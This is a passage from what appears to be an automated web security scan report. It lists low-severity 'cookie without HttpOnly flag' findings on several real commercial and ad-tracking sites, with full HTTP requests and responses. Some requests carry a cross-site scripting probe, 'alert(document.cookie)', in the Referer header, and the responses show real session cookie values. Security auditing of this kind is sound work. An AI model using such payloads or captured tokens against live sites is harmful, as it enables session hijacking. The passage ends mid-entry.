User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 20:05:14 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1; Path=/
Location: http://www.freemanco.com/store?from=freemanco
Content-Length: 0
Content-Type: text/html;charset=UTF-8


14.22. http://www.freemanco.com/store/scripts/jquery.form.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freemanco.com
Path:   /store/scripts/jquery.form.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/scripts/jquery.form.js HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/store/?from=freemancofb27d'%3balert(document.cookie)//6c9edc3f802
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:38:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
Set-Cookie: JSESSIONID=A69190F969B4B3882863F4380364FE84.node2; Path=/
ETag: W/"23124-1303250288000"
Last-Modified: Tue, 19 Apr 2011 21:58:08 GMT
Content-Length: 23124
Content-Type: text/javascript

/*
* jQuery Form Plugin
* version: 2.18 (06-JAN-2009)
* @requires jQuery v1.2.2 or later
*
* Examples and documentation at: http://malsup.com/jquery/form/
* Dual licensed under the MIT and
...[SNIP]...

14.23. http://www.freemanco.com/store/scripts/jquery1.3.2.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freemanco.com
Path:   /store/scripts/jquery1.3.2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/scripts/jquery1.3.2.js HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/store/?from=freemancofb27d'%3balert(document.cookie)//6c9edc3f802
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:38:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
Set-Cookie: JSESSIONID=3F1A1A4B67ABF4F925F415F725CDAB98.node2; Path=/
ETag: W/"120619-1303250288000"
Last-Modified: Tue, 19 Apr 2011 21:58:08 GMT
Content-Length: 120619
Content-Type: text/javascript

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

14.24. http://www.freemanco.com/store/styles/ui.datepicker.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freemanco.com
Path:   /store/styles/ui.datepicker.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/styles/ui.datepicker.css HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/store/?from=freemancofb27d'%3balert(document.cookie)//6c9edc3f802
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=95684043.1303848339.1.1.utmcsr=freemanco.com|utmccn=(referral)|utmcmd=referral|utmcct=/; hubspotdt=2011-04-26%2016%3A05%3A33; hubspotutk=84c62207a97646abbd415aaf29a2d55f; hubspotvd=84c62207a97646abbd415aaf29a2d55f; hubspotvw=84c62207a97646abbd415aaf29a2d55f; hubspotvm=84c62207a97646abbd415aaf29a2d55f; hsfirstvisit=http%3A%2F%2Fwww.freemanco.com%2Ffreemanco%2F%3Ffs%3Dtrue%26_requestid%3D118715|http%3A%2F%2Ffreemanco.com%2F|2011-04-26%2016%3A05%3A33; __utma=95684043.1984575328.1303848339.1303848339.1303848339.1; __utmb=95684043.2.10.1303848339

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:38:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
Set-Cookie: JSESSIONID=566E08A7B08C1BA212ABBD0C0DF8D101.node2; Path=/
ETag: W/"4591-1303250278000"
Last-Modified: Tue, 19 Apr 2011 21:57:58 GMT
Content-Length: 4591
Content-Type: text/css

/* Main Style Sheet for jQuery UI date picker */
#ui-datepicker-div, .ui-datepicker-inline {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 14px;
   padding: 0;
   margin: 0;
   /*background:
...[SNIP]...

14.25. http://www.fusionvm.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fusionvm.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fusionvm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 154
Content-Type: text/html
Location: https://www.fusionvm.com/FusionVM
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQSSATBSQ=PACBHAADNELIGEEPKHABKNFG; path=/
Date: Tue, 26 Apr 2011 21:48:20 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.fusionvm.com/FusionVM">here</a>.</body>

14.26. http://www.magellangps.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.magellangps.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.magellangps.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:21 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 683260212:73686F702D6A6176613030392E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MX8nN37JhRs4xgQhh5W7Lnb1Jc53pNQpqjTjC92CxyDtCYMrGLGkPwl7ttpLG17bGb2p89w1rry3cT4nB4JL2sZLLqQbXyts352vgQmSTCGhlQHnCT1z29G4QyVNL06W!-1123747554; path=/
Set-Cookie: NLVisitorId=rcHW8655AUWRwK0L; domain=www.magellangps.com; expires=Monday, 16-Apr-2012 21:39:22 GMT; path=/
Set-Cookie: NLShopperId=rcHW8655AUiRwJPx; domain=www.magellangps.com; expires=Tuesday, 03-May-2011 21:39:22 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=www.magellangps.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 77084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-Strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...

14.27. http://www.moxieinsight.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.moxieinsight.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.moxieinsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 20:57:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://moxieinsight.com/moxieinsight/xmlrpc.php
Set-Cookie: PHPSESSID=2b3c5d0878d7c9e78782ab15202c9e90; path=/
Location: http://moxieinsight.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8


14.28. http://www.visitortracklog.com/loghit.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitortracklog.com
Path:   /loghit.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /loghit.asp?id=105353&vr=4.0&rp=&pa=http%3A//www.moxiesoft.com/tal_products/knowledgebase.aspx HTTP/1.1
Host: www.visitortracklog.com
Proxy-Connection: keep-alive
Referer: http://www.moxiesoft.com/tal_products/knowledgebase.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cke106024=4%2F25%2F2011+12%3A23%3A45+PM

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:00:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Content-Length: 43
Content-Type: image/gif
Expires: Tue, 26 Apr 2011 21:00:28 GMT
Set-Cookie: cke105353=4%2F26%2F2011+5%3A00%3A28+PM; expires=Tue, 26-Apr-2016 21:00:28 GMT; path=/
Set-Cookie: ASPSESSIONIDAQTTQTDD=MJICEPPCOCKNIJOLAGCNFIIA; path=/
Cache-control: private

GIF89a.............!.......,...........D..;

14.29. http://www.visitortracklog.com/loghit.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.visitortracklog.com
Path:   /loghit.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /loghit.asp?id=105353&vr=4.0&rp=&pa=http%3A//moxieinsight.com/ HTTP/1.1
Host: www.visitortracklog.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cke106024=4%2F25%2F2011+12%3A23%3A45+PM; ASPSESSIONIDAQTTQTDD=BHGCEPPCPMBENNMAMGMIKEDF; cke105353=4%2F26%2F2011+4%3A57%3A19+PM

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:57:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
Content-Length: 43
Content-Type: image/gif
Expires: Tue, 26 Apr 2011 20:57:28 GMT
Set-Cookie: cke105353=4%2F26%2F2011+4%3A57%3A28+PM; expires=Tue, 26-Apr-2016 20:57:28 GMT; path=/
Set-Cookie: ASPSESSIONIDAQSRTTCC=JMALKFGDOKBDHLFMAJLPEKCM; path=/
Cache-control: private

GIF89a.............!.......,...........D..;

14.30. http://www.widgetbox.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.widgetbox.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:09 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=790842FDB2C0593350777C792C89D949; Path=/, node=1026; path=/
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8



...[SNIP]...

14.31. http://a.rfihub.com/ca.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ca.html?ra=8435996230.9279617241118103&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre8435996227678&pb=&pc=&pd=&pg=&ct=1303843599623 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; m="aAYCw2HtA==AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABWHF68w==AI89bBrQ==AAABL25eZA0="; f="aACMzXZKQ==AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aACM4yRNg==ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=co

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: b="aABHuDlYw==AC82AAABL5MiUls=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: m="aAZi9tCwA==AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: u="aABIE89Tw==AI89bBrQ==AAABL5MiUls=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: f="aADA1bk1g==AK1303843590AB1AAABL5MiUls=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: k="aADaAZB-w==AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1050

<html><body><img src="http://pixel.rubiconproject.com/tap.php?v=4140" border="0"
width="1" height="1">
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw
...[SNIP]...

14.32. http://a.rfihub.com/cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=2724386019227846218&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; b="aABHuDlYw==AC82AAABL5MiUls="; m="aAZi9tCwA==AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABIE89Tw==AI89bBrQ==AAABL5MiUls="; f="aADA1bk1g==AK1303843590AB1AAABL5MiUls=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aADaAZB-w==AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a2=2724386019227846218;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: j2=2724386019227846218;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1303843612779;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: u="aABIFtszg==AI89bBrQ==AAABL5MiqGs=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:52 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:52 GMT
Set-Cookie: a=c614741349159218131;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: j=c614741349159218131;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-LUTRuF4-Pbpl;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Set-Cookie: p=1-LUTRuF4-Pbpl;Path=/;Domain=.rfihub.com
Set-Cookie: r=1303177638413;Path=/;Domain=.rfihub.com;Expires=Mon, 21-Apr-31 18:46:52 GMT
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.33. http://action.mathtag.com/mm//PHOE//lpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm//PHOE//lpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm//PHOE//lpg?nm=LandngPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RandomNumber] HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=485052303411.0665?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303851733

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6299 25241
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Tue, 26 Apr 2011 21:02:15 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1303851735; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 21:02:15 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

14.34. http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

